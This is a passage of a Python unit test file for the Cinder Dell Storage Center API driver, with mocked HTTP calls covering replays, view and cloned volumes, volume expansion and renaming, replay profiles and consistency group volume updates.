def test_find_replay_failure(self,
mock_post,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where None is returned for replays
res = self.scapi.find_replay(self.VOLUME,
u'Cinder Test Replay012345678910')
self.assertTrue(mock_post.called)
self.assertTrue(mock_get_json.called)
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'find_replay',
return_value=RPLAYS)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_204)
def test_delete_replay(self,
mock_post,
mock_find_replay,
mock_close_connection,
mock_open_connection,
mock_init):
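        # Test case where the replay is found and deleted.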
replayId = u'Cinder Test Replay012345678910'
res = self.scapi.delete_replay(self.VOLUME,
replayId)
self.assertTrue(mock_post.called)
mock_find_replay.assert_called_once_with(self.VOLUME, replayId)
self.assertTrue(res, 'Expected True')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'find_replay',
return_value=None)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_204)
def test_delete_replay_no_replay(self,
mock_post,
mock_find_replay,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where specified ScReplay does not exist
replayId = u'Cinder Test Replay012345678910'
res = self.scapi.delete_replay(self.VOLUME,
replayId)
self.assertFalse(mock_post.called)
mock_find_replay.assert_called_once_with(self.VOLUME, replayId)
self.assertTrue(res, 'Expected True')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'find_replay',
return_value=TST_RPLAY)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_400)
def test_delete_replay_failure(self,
mock_post,
mock_find_replay,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where delete ScReplay results in an error
replayId = u'Cinder Test Replay012345678910'
res = self.scapi.delete_replay(self.VOLUME,
replayId)
self.assertTrue(mock_post.called)
mock_find_replay.assert_called_once_with(self.VOLUME, replayId)
self.assertFalse(res, 'Expected False')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=VOLUME)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_volume_folder',
return_value=FLDR)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_create_view_volume(self,
mock_post,
mock_find_volume_folder,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
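        # Test case where a view volume is created from the replay.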
vol_name = u'Test_create_vol'
res = self.scapi.create_view_volume(
vol_name,
self.TST_RPLAY,
None)
self.assertTrue(mock_post.called)
mock_find_volume_folder.assert_called_once_with(True)
self.assertTrue(mock_first_result.called)
self.assertEqual(self.VOLUME, res, 'Unexpected ScVolume')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=VOLUME)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_volume_folder',
return_value=None)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_create_view_volume_create_fldr(self,
mock_post,
mock_find_volume_folder,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where volume folder does not exist and must be created
vol_name = u'Test_create_vol'
res = self.scapi.create_view_volume(
vol_name,
self.TST_RPLAY,
None)
self.assertTrue(mock_post.called)
mock_find_volume_folder.assert_called_once_with(True)
self.assertTrue(mock_first_result.called)
self.assertEqual(self.VOLUME, res, 'Unexpected ScVolume')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=VOLUME)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_volume_folder',
return_value=None)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_create_view_volume_no_vol_fldr(self,
mock_post,
mock_find_volume_folder,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where volume folder does not exist and cannot be created
vol_name = u'Test_create_vol'
res = self.scapi.create_view_volume(
vol_name,
self.TST_RPLAY,
None)
self.assertTrue(mock_post.called)
mock_find_volume_folder.assert_called_once_with(True)
self.assertTrue(mock_first_result.called)
self.assertEqual(self.VOLUME, res, 'Unexpected ScVolume')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_volume_folder',
return_value=FLDR)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_204)
def test_create_view_volume_failure(self,
mock_post,
mock_find_volume_folder,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where view volume create fails
vol_name = u'Test_create_vol'
res = self.scapi.create_view_volume(
vol_name,
self.TST_RPLAY,
None)
self.assertTrue(mock_post.called)
mock_find_volume_folder.assert_called_once_with(True)
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'create_view_volume',
return_value=VOLUME)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'create_replay',
return_value=RPLAY)
def test_create_cloned_volume(self,
mock_create_replay,
mock_create_view_volume,
mock_close_connection,
mock_open_connection,
mock_init):
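        # Test case where the clone is created via a replay and view volume.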
vol_name = u'Test_create_clone_vol'
res = self.scapi.create_cloned_volume(
vol_name,
self.VOLUME,
['Daily'])
mock_create_replay.assert_called_once_with(self.VOLUME,
'Cinder Clone Replay',
60)
mock_create_view_volume.assert_called_once_with(
vol_name,
self.RPLAY,
['Daily'])
self.assertEqual(self.VOLUME, res, 'Unexpected ScVolume')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'create_view_volume',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'create_replay')
def test_create_cloned_volume_failure(self,
mock_create_replay,
mock_create_view_volume,
mock_close_connection,
mock_open_connection,
mock_init):
        # Test case where creating a cloned volume fails because
        # create_replay fails
vol_name = u'Test_create_clone_vol'
mock_create_replay.return_value = None
res = self.scapi.create_cloned_volume(
vol_name,
self.VOLUME,
['Daily'])
mock_create_replay.assert_called_once_with(self.VOLUME,
'Cinder Clone Replay',
60)
self.assertFalse(mock_create_view_volume.called)
self.assertIsNone(res, 'Expected None')
        # Again, but let create_view_volume fail.
mock_create_replay.return_value = self.RPLAY
res = self.scapi.create_cloned_volume(
vol_name,
self.VOLUME,
['Daily'])
mock_create_view_volume.assert_called_once_with(
vol_name,
self.RPLAY,
['Daily'])
self.assertIsNone(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=VOLUME)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_expand_volume(self,
mock_post,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
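        # Test case where the volume is successfully expanded.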
res = self.scapi.expand_volume(self.VOLUME, 550)
self.assertTrue(mock_post.called)
self.assertTrue(mock_get_json.called)
self.assertEqual(self.VOLUME, res, 'Unexpected ScVolume')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_204)
def test_expand_volume_failure(self,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.expand_volume(self.VOLUME, 550)
self.assertTrue(mock_post.called)
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'put',
return_value=RESPONSE_200)
def test_rename_volume(self,
mock_put,
mock_close_connection,
mock_open_connection,
mock_init):
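        # Test case where the volume rename succeeds.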
res = self.scapi.rename_volume(self.VOLUME, 'newname')
self.assertTrue(mock_put.called)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'put',
return_value=RESPONSE_400)
def test_rename_volume_failure(self,
mock_put,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.rename_volume(self.VOLUME, 'newname')
self.assertTrue(mock_put.called)
self.assertFalse(res)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'delete',
return_value=RESPONSE_200)
def test_delete_server(self,
mock_delete,
mock_close_connection,
mock_open_connection,
mock_init):
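        # Test case where the ScServer is deleted.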
res = self.scapi._delete_server(self.SCSERVER)
self.assertTrue(mock_delete.called)
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'delete',
return_value=RESPONSE_200)
def test_delete_server_del_not_allowed(self,
mock_delete,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where delete of ScServer not allowed
res = self.scapi._delete_server(self.SCSERVER_NO_DEL)
self.assertFalse(mock_delete.called)
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value={'test': 'test'})
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_get_user_preferences(self,
mock_get,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
# Not really testing anything other than the ability to mock, but
# including for completeness.
res = self.scapi._get_user_preferences()
self.assertEqual({'test': 'test'}, res)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_400)
def test_get_user_preferences_failure(self,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._get_user_preferences()
self.assertEqual({}, res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_user_preferences',
return_value=None)
def test_update_storage_profile_noprefs(self,
mock_prefs,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.update_storage_profile(None, None)
self.assertFalse(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_user_preferences',
return_value={'allowStorageProfileSelection': False})
def test_update_storage_profile_not_allowed(self,
mock_prefs,
mock_close_connection,
mock_open_connection,
mock_init):
LOG = self.mock_object(dell_storagecenter_api, "LOG")
res = self.scapi.update_storage_profile(None, None)
self.assertFalse(res)
self.assertEqual(1, LOG.error.call_count)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_storage_profile',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_user_preferences',
return_value={'allowStorageProfileSelection': True})
def test_update_storage_profile_prefs_not_found(self,
mock_profile,
mock_prefs,
mock_close_connection,
mock_open_connection,
mock_init):
LOG = self.mock_object(dell_storagecenter_api, "LOG")
res = self.scapi.update_storage_profile(None, 'Fake')
self.assertFalse(res)
self.assertEqual(1, LOG.error.call_count)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_user_preferences',
return_value={'allowStorageProfileSelection': True,
'storageProfile': None})
def test_update_storage_profile_default_not_found(self,
mock_prefs,
mock_close_connection,
mock_open_connection,
mock_init):
LOG = self.mock_object(dell_storagecenter_api, "LOG")
res = self.scapi.update_storage_profile(None, None)
self.assertFalse(res)
self.assertEqual(1, LOG.error.call_count)
@mock.patch.object(
dell_storagecenter_api.StorageCenterApi,
'_get_user_preferences',
return_value={'allowStorageProfileSelection': True,
'storageProfile': {'name': 'Fake',
'instanceId': 'fakeId'}})
@mock.patch.object(dell_storagecenter_api.HttpClient,
'put',
return_value=RESPONSE_200)
def test_update_storage_profile(self,
mock_put,
mock_prefs,
mock_close_connection,
mock_open_connection,
mock_init):
LOG = self.mock_object(dell_storagecenter_api, "LOG")
fake_scvolume = {'name': 'name', 'instanceId': 'id'}
res = self.scapi.update_storage_profile(fake_scvolume, None)
self.assertTrue(res)
        self.assertIn('fakeId', repr(mock_put.call_args_list[0]))
self.assertEqual(1, LOG.info.call_count)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=[RPLAY_PROFILE])
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_find_replay_profile(self,
mock_post,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
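        # Test case where a single matching replay profile is found.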
res = self.scapi.find_replay_profile('guid')
self.assertTrue(mock_post.called)
self.assertTrue(mock_get_json.called)
self.assertEqual(self.RPLAY_PROFILE, res, 'Unexpected Profile')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=[RPLAY_PROFILE, RPLAY_PROFILE])
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_find_replay_profile_more_than_one(self,
mock_post,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.find_replay_profile,
'guid')
self.assertTrue(mock_post.called)
self.assertTrue(mock_get_json.called)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=[])
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_find_replay_profile_empty_list(self,
mock_post,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.find_replay_profile('guid')
self.assertTrue(mock_post.called)
self.assertTrue(mock_get_json.called)
self.assertIsNone(res, 'Unexpected return')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_400)
def test_find_replay_profile_error(self,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.find_replay_profile('guid')
self.assertTrue(mock_post.called)
self.assertIsNone(res, 'Unexpected return')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'find_replay_profile',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=RPLAY_PROFILE)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_201)
def test_create_replay_profile(self,
mock_post,
mock_first_result,
mock_find_replay_profile,
mock_close_connection,
mock_open_connection,
mock_init):
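        # Test case where no profile exists, so a new one is created.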
res = self.scapi.create_replay_profile('guid')
self.assertTrue(mock_find_replay_profile.called)
self.assertTrue(mock_post.called)
self.assertTrue(mock_first_result.called)
self.assertEqual(self.RPLAY_PROFILE, res, 'Unexpected Profile')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'find_replay_profile',
return_value=RPLAY_PROFILE)
def test_create_replay_profile_exists(self,
mock_find_replay_profile,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.create_replay_profile('guid')
self.assertTrue(mock_find_replay_profile.called)
self.assertEqual(self.RPLAY_PROFILE, res, 'Unexpected Profile')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'find_replay_profile',
return_value=None)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_400)
def test_create_replay_profile_fail(self,
mock_post,
mock_find_replay_profile,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.create_replay_profile('guid')
self.assertTrue(mock_find_replay_profile.called)
self.assertTrue(mock_post.called)
self.assertIsNone(res, 'Unexpected return')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'delete',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id')
def test_delete_replay_profile(self,
mock_get_id,
mock_delete,
mock_close_connection,
mock_open_connection,
mock_init):
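        # Test case where the replay profile is deleted.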
profile = {'name': 'guid'}
self.scapi.delete_replay_profile(profile)
self.assertTrue(mock_get_id.called)
self.assertTrue(mock_delete.called)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'delete',
return_value=RESPONSE_400)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id')
def test_delete_replay_profile_fail(self,
mock_get_id,
mock_delete,
mock_close_connection,
mock_open_connection,
mock_init):
profile = {'name': 'guid'}
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.delete_replay_profile,
profile)
self.assertTrue(mock_get_id.called)
self.assertTrue(mock_delete.called)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=VOLUME_CONFIG)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id')
def test_get_volume_configuration(self,
mock_get_id,
mock_get,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
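        # Test case where the ScVolumeConfiguration is retrieved.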
res = self.scapi._get_volume_configuration({})
self.assertTrue(mock_get_id.called)
self.assertTrue(mock_get.called)
self.assertEqual(self.VOLUME_CONFIG, res, 'Unexpected config')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_400)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id')
def test_get_volume_configuration_bad_response(self,
mock_get_id,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._get_volume_configuration({})
self.assertTrue(mock_get_id.called)
self.assertTrue(mock_get.called)
self.assertIsNone(res, 'Unexpected result')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_configuration',
return_value=VOLUME_CONFIG)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'put',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id')
def test_update_volume_profiles(self,
mock_get_id,
mock_put,
mock_get_volume_configuration,
mock_close_connection,
mock_open_connection,
mock_init):
scvolume = {'instanceId': '1'}
existingid = self.VOLUME_CONFIG[u'replayProfileList'][0][u'instanceId']
vcid = self.VOLUME_CONFIG[u'instanceId']
# First get_id is for our existing replay profile id and the second
# is for the volume config and the last is for the volume id. And
# then we do this again for the second call below.
mock_get_id.side_effect = [existingid,
vcid,
scvolume['instanceId'],
existingid,
vcid,
scvolume['instanceId']]
newid = '64702.1'
expected_payload = {'ReplayProfileList': [newid, existingid]}
expected_url = 'StorageCenter/ScVolumeConfiguration/' + vcid
res = self.scapi._update_volume_profiles(scvolume, newid, None)
self.assertTrue(mock_get_id.called)
self.assertTrue(mock_get_volume_configuration.called)
mock_put.assert_called_once_with(expected_url, expected_payload, True)
self.assertTrue(res)
# Now do a remove. (Restarting with the original config so this will
# end up as an empty list.)
expected_payload['ReplayProfileList'] = []
res = self.scapi._update_volume_profiles(scvolume, None, existingid)
self.assertTrue(mock_get_id.called)
self.assertTrue(mock_get_volume_configuration.called)
mock_put.assert_called_with(expected_url, expected_payload, True)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_configuration',
return_value=VOLUME_CONFIG)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'put',
return_value=RESPONSE_400)
# We set this to 1 so we can check our payload
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id')
def test_update_volume_profiles_bad_response(self,
mock_get_id,
mock_put,
mock_get_volume_configuration,
mock_close_connection,
mock_open_connection,
mock_init):
scvolume = {'instanceId': '1'}
existingid = self.VOLUME_CONFIG[u'replayProfileList'][0][u'instanceId']
vcid = self.VOLUME_CONFIG[u'instanceId']
# First get_id is for our existing replay profile id and the second
# is for the volume config and the last is for the volume id. And
# then we do this again for the second call below.
mock_get_id.side_effect = [existingid,
vcid,
scvolume['instanceId'],
existingid,
vcid,
scvolume['instanceId']]
newid = '64702.1'
expected_payload = {'ReplayProfileList': [newid, existingid]}
expected_url = 'StorageCenter/ScVolumeConfiguration/' + vcid
res = self.scapi._update_volume_profiles(scvolume, newid, None)
self.assertTrue(mock_get_id.called)
self.assertTrue(mock_get_volume_configuration.called)
mock_put.assert_called_once_with(expected_url, expected_payload, True)
self.assertFalse(res)
# Now do a remove. (Restarting with the original config so this will
# end up as an empty list.)
expected_payload['ReplayProfileList'] = []
res = self.scapi._update_volume_profiles(scvolume, None, existingid)
self.assertTrue(mock_get_id.called)
self.assertTrue(mock_get_volume_configuration.called)
mock_put.assert_called_with(expected_url, expected_payload, True)
self.assertFalse(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_configuration',
return_value=None)
def test_update_volume_profiles_no_config(self,
mock_get_volume_configuration,
mock_close_connection,
mock_open_connection,
mock_init):
scvolume = {'instanceId': '1'}
res = self.scapi._update_volume_profiles(scvolume, '64702.2', None)
self.assertTrue(mock_get_volume_configuration.called)
self.assertFalse(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'find_volume',
return_value=999)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_update_volume_profiles',
return_value=True)
def test_add_cg_volumes(self,
mock_update_volume_profiles,
mock_find_volume,
mock_close_connection,
mock_open_connection,
mock_init):
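        # Test case where the volume is added to the CG profile.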
profileid = '100'
add_volumes = [{'id': '1', 'provider_id': '1'}]
res = self.scapi._add_cg_volumes(profileid, add_volumes)
self.assertTrue(mock_find_volume.called)
mock_update_volume_profiles.assert_called_once_with(999,
addid=profileid,
removeid=None)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'find_volume',
return_value=999)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_update_volume_profiles',
return_value=False)
def test_add_cg_volumes_fail(self,
mock_update_volume_profiles,
mock_find_volume,
mock_close_connection,
mock_open_connection,
mock_init):
profileid = '100'
add_volumes = [{'id': '1', 'provider_id': '1'}]
res = self.scapi._add_cg_volumes(profileid, add_volumes)
self.assertTrue(mock_find_volume.called)
mock_update_volume_profiles.assert_called_once_with(999,
addid=profileid,
removeid=None)
self.assertFalse(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'find_volume',
return_value=999)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_update_volume_profiles',
return_value=True)
def test_remove_cg_volumes(self,
mock_update_volume_profiles,
mock_find_volume,
mock_close_connection,
mock_open_connection,
mock_init):
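        # Test case where the volume is removed from the CG profile.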
profileid = '100'
remove_volumes = [{'id': '1', 'provider_id': '1'}]
res = self.scapi._remove_cg_volumes(profileid, remove_volumes)
self.assertTrue(mock_find_volume.called)
mock_update_volume_profiles.assert_called_once_with(999,
addid=None,
removeid=profileid)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'find_volume',
return_value=999)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_update_volume_profiles',
return_value=False)
def test_remove_cg_volumes_false(self,
mock_update_volume_profiles,
mock_find_volume,
mock_close_connection,
mock_open_connection,
mock_init):
profileid = '100'
remove_volumes = [{'id': '1', 'provider_id': '1'}]
res = self.scapi._remove_cg_volumes(profileid, remove_volumes)
self.assertTrue(mock_find_volume.called)
mock_update_volume_profiles.assert_called_once_with(999,
addid=None,
removeid=profileid)
self.assertFalse(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_remove_cg_volumes',
return_value=True)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_add_cg_volumes',
return_value=True)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id',
return_value='100')
def test_update_cg_volumes(self,
mock_get_id,
mock_add_cg_volumes,
mock_remove_cg_volumes,
mock_close_connection,
mock_open_connection,
mock_init):
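        # Test case where the CG update both adds and removes volumes.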
profile = {'name': 'guid'}
add_volumes = [{'id': '1'}]
remove_volumes = [{'id': '2'}]
res = self.scapi.update_cg_volumes(profile,
add_volumes,
remove_volumes)
self.assertTrue(mock_get_id.called)
mock_add_cg_volumes.assert_called_once_with('100', add_volumes)
mock_remove_cg_volumes.assert_called_once_with('100',
remove_volumes)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_remove_cg_volumes',
return_value=True)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_add_cg_volumes',
return_value=True)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id',
return_value='100')
def test_update_cg_volumes_no_remove(self,
mock_get_id,
mock_add_cg_volumes,
mock_remove_cg_volumes,
mock_close_connection,
mock_open_connection,
mock_init):
profile = {'name': 'guid'}
add_volumes = [{'id': '1'}]
remove_volumes = []
res = self.scapi.update_cg_volumes(profile,
add_volumes,
remove_volumes)
self.assertTrue(mock_get_id.called)
mock_add_cg_volumes.assert_called_once_with('100', add_volumes)
self.assertFalse(mock_remove_cg_volumes.called)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_remove_cg_volumes',
return_value=True)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_add_cg_volumes',
return_value=True)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id',
return_value='100')
def test_update_cg_volumes_no_add(self,
mock_get_id,
mock_add_cg_volumes,
mock_remove_cg_volumes,
mock_close_connection,
mock_open_connection,
mock_init):
profile = {'name': 'guid'}
add_volumes = []
remove_volumes = [{'id': '1'}]
res = self.scapi.update_cg_volumes(profile,
add_volumes,
remove_volumes)
self.assertTrue(mock_get_id.called)
mock_remove_cg_volumes.assert_called_once_with('100', remove_volumes)
self.assertFalse(mock_add_cg_volumes.called)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_remove_cg_volumes')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_add_cg_volumes',
return_value=False)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id',
return_value='100')
def test_update_cg_volumes_add_fail(self,
mock_get_id,
mock_add_cg_volumes,
mock_remove_cg_volumes,
mock_close_connection,
mock_open_connection,
mock_init):
profile = {'name': 'guid'}
add_volumes = [{'id': '1'}]
remove_volumes = [{'id': '2'}]
res = self.scapi.update_cg_volumes(profile,
add_volumes,
remove_volumes)
self.assertTrue(mock_get_id.called)
mock_add_cg_volumes.assert_called_once_with('100', add_volumes)
        self.assertFalse(mock_remove_cg_volumes.called)
self.assertFalse(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_remove_cg_volumes',
return_value=False)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_add_cg_volumes',
return_value=True)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id',
return_value='100')
def test_update_cg_volumes_remove_fail(self,
mock_get_id,
mock_add_cg_volumes,
mock_remove_cg_volumes,
mock_close_connection,
mock_open_connection,
mock_init):
profile = {'name': 'guid'}
add_volumes = [{'id': '1'}]
remove_volumes = [{'id': '2'}]
res = self.scapi.update_cg_volumes(profile,
add_volumes,
remove_volumes)
self.assertTrue(mock_get_id.called)
mock_add_cg_volumes.assert_called_once_with('100', add_volumes)
mock_remove_cg_volumes.assert_called_once_with('100',
remove_volumes)
self.assertFalse(res)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=[INACTIVE_VOLUME])
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_init_volume')
def test_init_cg_volumes_inactive(self,
mock_init_volume,
mock_get_json,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
profileid = 100
self.scapi._init_cg_volumes(profileid)
self.assertTrue(mock_get.called)
self.assertTrue(mock_get_json.called)
mock_init_volume.assert_called_once_with(self.INACTIVE_VOLUME)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=[VOLUME])
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_init_volume')
def test_init_cg_volumes_active(self,
mock_init_volume,
mock_get_json,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
profileid = 100
self.scapi._init_cg_volumes(profileid)
self.assertTrue(mock_get.called)
self.assertTrue(mock_get_json.called)
self.assertFalse(mock_init_volume.called)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_204)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id',
return_value='100')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_init_cg_volumes')
def test_snap_cg_replay(self,
mock_init_cg_volumes,
mock_get_id,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
replayid = 'guid'
expire = 0
profile = {'instanceId': '100'}
        # The '100' below comes from the mocked _get_id above.
expected_url = 'StorageCenter/ScReplayProfile/100/CreateReplay'
expected_payload = {'description': replayid, 'expireTime': expire}
res = self.scapi.snap_cg_replay(profile, replayid, expire)
mock_post.assert_called_once_with(expected_url, expected_payload, True)
self.assertTrue(mock_get_id.called)
self.assertTrue(mock_init_cg_volumes.called)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_400)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id',
return_value='100')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_init_cg_volumes')
def test_snap_cg_replay_bad_return(self,
mock_init_cg_volumes,
mock_get_id,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
replayid = 'guid'
expire = 0
profile = {'instanceId': '100'}
        # The '100' below comes from the mocked _get_id above.
expected_url = 'StorageCenter/ScReplayProfile/100/CreateReplay'
expected_payload = {'description': replayid, 'expireTime': expire}
res = self.scapi.snap_cg_replay(profile, replayid, expire)
mock_post.assert_called_once_with(expected_url, expected_payload, True)
self.assertTrue(mock_get_id.called)
self.assertTrue(mock_init_cg_volumes.called)
self.assertFalse(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=CGS)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_find_sc_cg(self,
mock_get,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_sc_cg(
{},
'GUID1-0869559e-6881-454e-ba18-15c6726d33c1')
self.assertEqual(self.CGS[0], res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=CGS)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_find_sc_cg_not_found(self,
mock_get,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_sc_cg(
{},
'GUID3-0869559e-6881-454e-ba18-15c6726d33c1')
self.assertIsNone(res)
@mock.patch.object(dell_storagecenter_api.HttpClient,
